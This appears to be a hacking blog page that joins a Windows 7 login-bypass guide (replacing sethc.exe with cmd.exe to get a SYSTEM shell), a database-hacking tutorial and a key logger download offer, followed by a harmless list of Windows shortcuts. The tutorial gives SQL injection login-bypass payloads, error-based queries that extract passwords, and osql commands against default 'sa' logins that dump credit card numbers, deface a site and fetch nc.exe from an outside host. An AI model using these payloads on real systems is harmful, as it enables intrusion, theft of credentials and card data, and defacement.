Removing Windows 7 User / Administrator Password

o, You forgot your password. I am here to help you just at the instant you asked for help. I will explain the process in my style.First the main concept and then its implimention. This way, I can force you to read all the content and upgrade your knowledge level somewhat.  .

“I am telling you for the educational purpose only. Use it at own risk. I am not responsible for any harm done by you to yourself and others.”

Lets gets ON.

If you have used Linux , you will know that there are two kinds of users in the Linux OS. First one is a simple user that has permission to perform normal routine work on the computer system on which he has access. And second one is root. The root has all sorts of permissions you can think of.

Same is the case for Windows. We too have two kinds of users in Windows, one is User( having normal Administrative privileges) and other one is Administrator. We think that the Administrator has all the power in his hand, and we can do anything with this account. However, it is not true. Administrator does not holds the total power. If you are a keen observer and somewhat experimental in nature, you must have noticed in Windows Xp, that some processes that are triggered by the owner System can not be ended by the Administrator himself.

So, I think you got the real player behind the game.

Administrator is the user account that certainly has got more administrative powers than the normal user but do not have all. It is a sort of power user. In Windows XP, mostly all the users do not temper with this Administrative account, so it is easy to press Ctrl+Alt+Del key on the Login Window, and then writing the Administrative in the User field and then hitting the Enter key and by doing this, you got entrance to the Administrator account and now, you can remove the password of the victim.

But, you can’t  do this in Windows 7, you do not get that login user and pass window here, and even in the case of Windows XP, if original and genuine user has applied the password in all the available accounts and Administrator, you would have been choked there.

Till now, I told you about the root user of Windows and one old trick of breaking Windows XP password.

Windows employs File Protection System. This protection is mostly responsible for keeping you in limits as decided by your authorized level. So, it simply means that if you want to have a date with SAM files, you will have to get rid of the FPS. It is not an easy task because FPS get switched on at the moment you see your login screen. So, it simply means that you need to do anything you want when Window is  not running, I mean when there is another OS on your computer.

Linux Live CDs would come to you to rescue you. They will give you a live demo how the Linux machine looks like. You won’t need to install the Linux in your HDD.

Well, before I tell you about the actual procedure, I would like to tell you about the methods I tried to get rid of password. I tried 4 methods. Fourth one is the universal method that I got.

1)  Firstly,, I thought renaming the SAM file located in C:\Windows\System32\Config folder . On some in depth reading and researching I found that this method only works for the Windows XP SP1. If you did it in after Windows of XP SP1, you will be welcomed by a Warning message that declaring that SAM file is corrupted then you computer will reboot. If you do it Windows 7, you will not be fortunate enough to know what the hell has happened to your computer. Your computer will keep on rebooting in the boot screen.

2) Secondly, I thought that I should replace the while config folder files of target computer with the my config folder ( that do not has password). This method will work, if you have the two systems of same architecture and same configuration. And if you do not have that, you will welcomed by BSoD. (Blue Screen of Death).

3) Another alternative could have been copying all the SAM, SYSTEM files from the Repair folder in the C:\Windows\Repair. This method will work if this folder existed in your computer. I mean it does not exists in Windows 7. But it is there in Windows XP Later 2 Service Packs (2 & 3). It will take to your computer’s ICE AGE. I mean you will have no drivers installed and no software. But certainly, it would work. 

4) In the 4th and final method, I tried, I used Linux Live Cd and got into Windows File System.

Let me explain everything with the help of screen shots.

This picture shows that I really got a computer that has an Windows 7 where I forgot the password intentionally to write the post  .

Login Screen

You need to have a Linux Live Cd. I am using Virtual Box for demonstrating the breaking. However, today most of the motherboards support booting from pen drive, so it would be fine if you could just make a pen drive boot-able and try the Linux live CD from that only.

So, I booted into Linux, this screenshots shows the options you need to choose to go on. Hit trying the Ubuntu. Then, you will see the   desktop of the Ubuntu after you got into that.

And the Desktop looks like.

After this, Click on the Tool Bar option “Places”. A drop down menu would come up in which you are required to select the computer option. You can select any other option too. The Computer options leads you to a window like

I am showing you this on the Virtual Box. So, I have made just one partition of size 11 GB. You would have to recognize the correct partition of Windows, C Drive. It could be done simply by opening each partition and examining the Files and Folders in the partitions.

I opened the partition and I got the files.

As you can see,  I got Windows folder here. It is the System Root Drive. C Drive. Now, firstly nevigate to C:\Windows\System32 Folder. And locate the file Sethc.exe. Right click on the file after selecting it. Go to other location in your computer. Anywhere. Right CLick and create a new folder. Copy this file here (sethc.exe). Now, Locate the CMD.exe file and copy to it another location and rename it to sethc.exe and place it in the C:\Windows\System32. Now, you can exit Linux Live Cd now. I hope you will be able to do copy paste by yourself.

So, After you have done this. Restart your computer. If you used Cd drive. remove the Cd, if you used Pen Drive, remove your pen drive. Now, again you will see  the same login screen asking for password.:(

However, if you press Shift Key for 5 times, or hold it for nearly 8 seconds, A change would happen. Let us see what will happen.

The Command Prompt that appears here is very very special. 1st reason is that it is not annoying me for Password. Secondly, it is running at the supreme user mode available in Windows.

If you want to know it. Just type “whoami”. It will tell you who he is.

The main point is to remove the password. It is most simple. Just type

net user username *

and press enter 2 times or enter the new passowrd. Passowrd would be reset. Here, username stands for the your Username which is in our case is Demo. Anothere thing to be seen is, there is a space between the username and *.

You can exit the cmd by exit cmd. And if you have not entered any password, then do not type anything into the passowrd field, only press enter. You will be forwarded to Desktop.

Now, time for some explanation. Sethc.exe process is responisble for two type of keys. Sticky keys and filter keys. I have replaced the sethc.exe with the command prompt. Sp, when the system call tries to invoke sethc.exe process, it calls the Cmd. Since, no user has been login still, the command prompt uses a account which is always login. System the mot powerfual account in Windows 7. Through this Cmd, you hold all the power to do anything to this computer and hence, you changed the password.

You can use this method on Windows Xp. Only thing that would not work in XP is whoami command. Everthing else would be same as above.

Hacking Database Server

Databases have been the heart of a commercial website. An attack on the database servers can cause a great monetary loss for the company. Database servers are usually hacked to get the credit card information. And just one hack on a commercial site will bring down its reputation and also the customers as they also want their credit card info secured. Most of the commercial websites use Microsoft sql (MSsql) and Oracle database servers. MS sql still owns the market because the price is very low. While Oracle servers come with high price. Well some time ago Oracle had claimed itself to be “unbreakable” But hackers took it as a challenge and showed lots of bugs in it also !! I was addicted to hacking of database servers from a few months. So I just decided to share the knowledge with others. Well the things discussed here are not discovered by me ok. Yeah I experimented with them a lot.

user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the logincheck.asp page where it will be checked using the query string. If it doesn't get an entry satisfying the query and will reach end of file a message of login failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully without knowing the password. How ? Lets look at the querry again.

"Select * from table1 where login='"&log& "' and password='" &pwd& "' " 

Now if a user types his login name as "Chintan" and password as "h4x3r" then these values will pass to the asp page with post method and then the above query will become 

"Select * from table1 where login=' Chintan ' and password=' h4x3r ' " 

Thats fine. There will be an entry Chintan and h4x3r in login and password fields in the database so we will receive a message as login successful. Now what if I type loginname as "Chintan" and password as
hi' or 'a'='a in the password text box ? The query will become as follows:

"Select * from table1 where login=' Chintan ' and password=' hi' or 'a'='a ' " 

And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of hacker which was due to carelessness of web designer ? !! 
The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'. Clearly password is not 'hi' but at the same time 'a'='a' . So condition is satisfied. And a hacker is in with login "Chintan" !! You can try the following in the password text box if the above doesn't work for some websites:

hi" or "a"="a 
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Here above -- will make the rest of the query string to be a comment other conditions will not be checked. Similary you can provide 

Chintan ' -- 
Chintan " --

or such types of other possibilites in the login name textbox and password as anything which might let you in. Because in the query string only login name is checked as "Chintan" and rest is ignored due to --. Well if you are lucky enough you get such a website were the webdesigner has done the above mistake and then you will be able to login as any user !!! 

IMP NOTE: Hey guys I have put up a page where you can experiment for yourself about the sql injectionvulnerablity. Just go to www33.brinkster.com/chintantrivedi/login.htm 
More advance hacking of Databases using ODBC error messages!!!
--------------------------------------------------------------

Above we saw as to how login successfully without knowing password. Now over here I will show you how to read the whole database just by using queries in the URL !! And this works only for IIS i.e asp pages. And we know that IIS covers almost 35% of the web market. So you will definitely get a victim just after searching a few websites. You might have seen something like

http://www.nosecurity.com/mypage.asp?id=45 

in the URLs. '?' over there shows that after it, 45 value is passed to a hidden datatype id. Well if you don't understand then as we have seen in the above example in the login.htm, having two input text types with names 'login_name' and 'pass' and there values were passed to logincheck.asp page. The same thing can be done by directly opening the logincheck.asp page using 
http://www.nosecurity.com/logincheck.asp?login_name=Chintan&pass=h4x3r
in the URL if method="get" is used instead of method="post".

Note : or Difference between get and post method is that post method doesn't show up values passed to next paged in the url while get method shows up the values. To get more understanding of how they internally work readHTTP protocol RFC 1945 and RFC 2616.

What i mean to say is that after '?' the variables which are going to be used in that page are assigned the values. As above login_name is given value Chintan. And different variables are separated by operator '&'. 

OK so coming back, id will mostly be hidden type and according to the links you click its value will change. This value of id is then passed in the query in mypage.asp page and according tothe results you get the desired page at your screen. Now if just change the value of id as 46 then you will get different page. 
Now lets start our hacking the database. Lets use the magic of queries. Just type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- 

in the URL. INFORMATION_SCHEMA.TABLES is a system table and it contains information of all the tables of the server. In that there is field TABLE_NAME which contains names of all the tables. See the query again 
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
The result of this query is the first table name from INFORMATION_SCHEMA.TABLES table. But the result we get is a table name which is a string(nvarchar) and we are uniting it with 45(integer) by UNION. So we will get an error message as

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line

From the error its clear that first table is 'logintable'. It seems that this table might contain login names and passwords :-) So lets move in it. Type the following in the URL 

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'-- 

output 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5

The above error message shows that the first field or column in logintable is login_id. To get the next column name will type 

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')-- 

Output: 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5

So we get one more field name as 'login_name'. To get the third field name we will write 

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')-- 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5

Thats it. We ultimately get the 'passwd' field. Now lets get the login names and 
passwords from this table "logintable". Type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable-- 

Output: 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5

Thats the login name "Rahul" and to get the password of Rahul the query would be 

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable 
where login_name='Rahul'--

Output: 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5

Voila!! login name: Rahul and password: P455w0rd. You have cracked the database of 
www.nosecurity.com And's it was possible to the request of user was not checked properly. SQL
vulnerabilities still exist on many websites. The best solution is to parse the user requests and
filter out some characters as ',",--,:,etc.

Part II - using port 1434 (SQL Port) 
-------------------------------------

Well uptill now we had seen how to break the database using the malformed URLs But that was done using just port 80 (http port) But this time we would use the port 1434 for hacking. Before that we will see what actually database servers are and how do they work and then how to exploit them ! 

The designers of MS sql gave some default stored procedures along with the product to make things flexible to the webdesigners. The procedure is nothing but functions which can used to perform some actions on the arguments passed to them. This procedures are very important to hackers. Some of the important ones are 

sp_passsword -> Changes password for a specific login name. 
e.g. EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’

sp_tables -> Shows all the tables in the current database. 
e.g. EXEC sp_tables

xp_cmdshell -> Runs arbitary command on the machine with administrator privileges. (most imp) 

xp_msver -> Shows the MS SQL server version including the all info about the OS. 
e.g. master..xp_msver

xp_regdeletekey -> Deletes a registry key. 

xp_regdeletevalue ->Delets a registry value 

xp_regread -> Reads a registry value 

xp_regwrite -> Writes a registry key. 

xp_terminate_process -> Stops a process 

Well these are some important procedures. Actually there are more than 50 such types of procedures. If you want your MS SQL server to be protected then I would recommend to delete all of these procedures. The trick is open the Master database using MS SQL Server Enterprise Manager. Now expand the Extended Stored Procedures folder and delete the stored procedure by right click and delete. 

Note: “Master” is an important database of the SQL server which contains all system information like login names and system stored procedures. So if a hacker deletes this master database then the SQL server will be down for ever. Syslogins is the default system table which contains the usernames and passwords of logins in the database. 


Most dangerous threat : The Microsoft SQL server has default username “sa” with password blank “”. And this has ruined lots of MS sql servers in the past. Even a virus regarding this vulnerability had been released. 

Thatz enough. Lets hack now. First we need to find out a vulnerable server. Download a good port scanner (many out there on web ) and scan for ip addresses having port 1433/1434 (tcp or udp) open. This is the MS Sql port which runs the sql service. Oracle’s port no. is 1521. Lets suppose we got a vulnerable server with ip 198.188.178.1 (its just an example so don’t even try it) Now there are many ways to use the SQL service. Like telnet or netcat to port no. 1433/1434. You can also use a tool known as osql.exe which ships with any SQL server 2000. Okz. Now go to dos prompt and type. 

C:>osql.exe -? 
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]

Well, this displays the help of the osql tool. Its clear from the help what we have to do now. Type 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” 
1>
Thats what we get if we login successfully else we will get an error message as login failed for user “sa”

Now if we want to execute any command on the remote machine then just use the “xp_cmdshell” default stored procedure. 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir >dir.txt’” 

I would prefer to use –Q option instead of –q because it exits after executing the query. In the same manner we can execute any command on the remote machine. We can even upload or download any files on/from the remote machine. A smart attacker will install a backdoor on the machine to gain access to in future also. Now as I had explained earlier we can use the “information_schema.tables” to get the list of tables and contents of it. 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from information_schema.tables” 

And getting table names look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc. 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from users” 

And 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select username, creditcard, expdate from users” 

Output: 

Username creditcard expdate 
----------- ------------ ----------
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000

Write something in index.html file ? 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘echo defaced by Chintan > C:\inetpub\wwwroot\index.html’” 

Wanna upload any file on the remote system. 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘tftp 203.192.16.12 GET nc.exe c:\nc.exe’” 

And to download any file we can use the PUT request instead of GET Its just because this commands are being executed on the remote machine and not on ours. So if you give the GET request the command will be executed on the remote machine and it will try to get the nc.exe file from our machine to the remote machine. 

Thatz not over. Toolz for hacking the login passwords of Sql servers are easily available on the web. Even many buffer overflows are being discovered which can allow user to gain the complete control of the sytem with administrator privileges. The article is just giving some general issues about database servers. 

Remember the Sapphire worm? Which was released on 25th Jan. The worm which exploited three known vulnerabilities in the SQL servers using 1433/1434 UDP ports. 

Precautionay measures 
---------------------------

<*> Change the default password for sa. 
<*> Delete all the default stored procedures.
<*> Filter out all the characters like ',",--,:,etc.
<*> Keep upto date with patches
<*> Block the ports 1433/1434 MS SQL and 1521 (oracle) ports using firewalls.

Remember security is not an add-on feature. It depends upon the smartness of administrator. The war between the hacker and administrator will go on and on and on…. The person who is aware with the latest news or bug reports will win the war. Database admins should keep in touch with some sites.

Home Key Logger - Free Download

Key logger:

It is an application software which is used to capture all the inputs which all are given

by keyboards and save in a word document. We cannt get free key logger software in online easily.

Home key logger is a free key logger. Please click the download button and use it. (Some times firewall may block this key logger. Configure that and use this key logger).

Download Home KeyLogger

Windwos 7 shortcut keys

Windows 7 Shortcut Keys

New in Windows 7

The → symbol stands for the right arrow key, ← for the left arrow key, etc.

Win+↑    Maximize the current window
Win+↓    If the current window is maximized, restore it; if the current window is restored, minimize it
Win+←    Dock the current window to the left half of the screen
*If it is already docked left, it is moved to the right half of the screen
*If it is already docked right, it is restored to its original size
Win+→    Dock the current window to the right half of the screen
*If it is already docked right, it is moved to the left half of the screen
*If it is already docked left, it is restored to its original size
Win+Shift+←    Move current window to the left monitor (with dual monitors)
Win+Shift+→    Move current window to the right monitor (with dual monitors)
Win+Home    Minimize all but the current window
Win+Space    Peek at the desktop
Win+[Plus sign]    Zoom in
Win+[Minus sign]    Zoom out
Win+P    Open the projection menu (generally used for laptops connected to projectors)
Alt+P    In Explorer, show/hide the preview pane
Taskbar Modifiers (New in Windows 7)

Shift+Click    Open a new instance of the program
Ctrl+Click    Cycle between windows in a group
Middle Click    Open a new instance of the program
Ctrl+Shift+Click    Open a new instance of the program as Administrator
Shift+Right-Click    Show window menu
Managing Windows

Alt+F4    Close the active window
Alt+Tab    Switch to previous active window
Alt+Esc    Cycle through all open windows
Win+Tab    Flip 3D [more info]
Ctrl+Win+Tab    Persistent Flip 3D
Win+T    Cycle through applications on taskbar (showing its live preview)
Win+M    Minimize all open windows
Win+Shift+M    Undo all window minimization
Win+D    Toggle showing the desktop
Win+↑    Maximize the current window
Win+↓    If the current window is maximized, restore it; if the current window is restored, minimize it
Win+←    Dock the current window to the left half of the screen
*If it is already docked left, it is moved to the right half of the screen
*If it is already docked right, it is restored to its original size
Win+→    Dock the current window to the right half of the screen
*If it is already docked right, it is moved to the left half of the screen
*If it is already docked left, it is restored to its original size
Win+Shift+←    Move current window to the left monitor (with dual monitors)
Win+Shift+→    Move current window to the right monitor (with dual monitors)
Win+Home    Minimize all but the current window
Win+Space    Peek at the desktop
Win+[Plus sign]    Zoom in
Win+[Minus sign]    Zoom out
Starting Programs

Win+1    Open the first program on your Quick Launch bar
Win+2    Open the second program on your Quick Launch bar
Win+n    Open the nth program on your Quick Launch bar
Win+U    Open the ease of access center
Win+F    Open the search window
Win+X    Open the Mobility Center
Win+E    Open Explorer
Win+R    Open the Run window [more info]
Win+B    Move focus to notification tray (the right-most portion of the taskbar)
Win+P    Open the projection menu (generally used for laptops connected to projectors)
Win+Pause    Open the System Properties portion from the Control Panel
Ctrl+Shift+Esc    Open Windows Task Manager
Logging In And Out

While the below shortcuts seem unwieldy because of their length, they're quite easy to remember once you try them out a few times.

Win, →, Enter    Shutdown
Win, →, →, R    Restart
Win, →, →, S    Sleep
Win, →, →, W    Switch Users
Win+L    Locks computer
Viewing Folders With Explorer

Alt+←    Go back
Alt+→    Go forward
Alt+↑    Go up a directory
Alt+D    Move focus to address bar
Alt+D, Tab    Move focus to search bar
Alt+Enter    Open the Properties window of the current selection
Ctrl+Mousewheel    Change the view type (extra large, small, list view, detail, etc.)
Alt+P    Show/hide the preview pane